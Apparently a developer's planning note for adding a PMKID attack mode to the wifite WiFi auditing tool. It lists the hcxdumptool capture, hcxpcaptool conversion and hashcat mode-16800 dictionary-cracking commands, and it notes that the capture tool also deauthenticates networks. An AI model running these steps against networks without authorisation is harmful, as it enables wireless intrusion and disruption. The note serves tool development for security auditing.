See https://hashcat.net/forum/thread-7717.html
- Start
hcxdumptool
(daemon)sudo hcxdumptool -i wlan1mon -o pmkid.pcapng -t 10 --enable_status=1
- Should also use
-c <channel>
,--filterlist
and--filtermode
to target a specific client - Could be a new attack type:
wifite.attack.pmkid
- Detect when PMKID is found.
hcxpcaptool -z pmkid.16800 pmkid.pcapng
- Single-line in pmkid.16800 will have PMKID, MACAP, MACStation, ESSID (in hex).
- Save
.16800
file (to./hs/
? or./pmkids/
?)- New result type:
pmkid_result
- Add entry to
cracked.txt
- New result type:
- Run crack attack using hashcat:
./hashcat64.bin --force -m 16800 -a0 -w2 path/to/pmkid.16800 path/to/wordlist.txt
- Requires latest hashcat to be installed. This might be in a different directory.
- Use can specify path to hashcat? Yeck...
- % hashcat -h | grep 16800
- 16800 | WPA-PMKID-PBKDF2
- If target can't be attacked... we need to detect this failure mode.
- Might need to scrape
hcxdumptool
's output - Look at
pmkids()
func in .bashrc - hcxpcaptool -z OUTPUT.16800 INPUT.pcapng > /dev/null
- Check OUTPUT.16800 for the ESSID.
- Might need to scrape
- Wireless adapter support is minimal, apparently.
- hcxdumptool also deauths networks and captures handshakes... maybe unnecessarily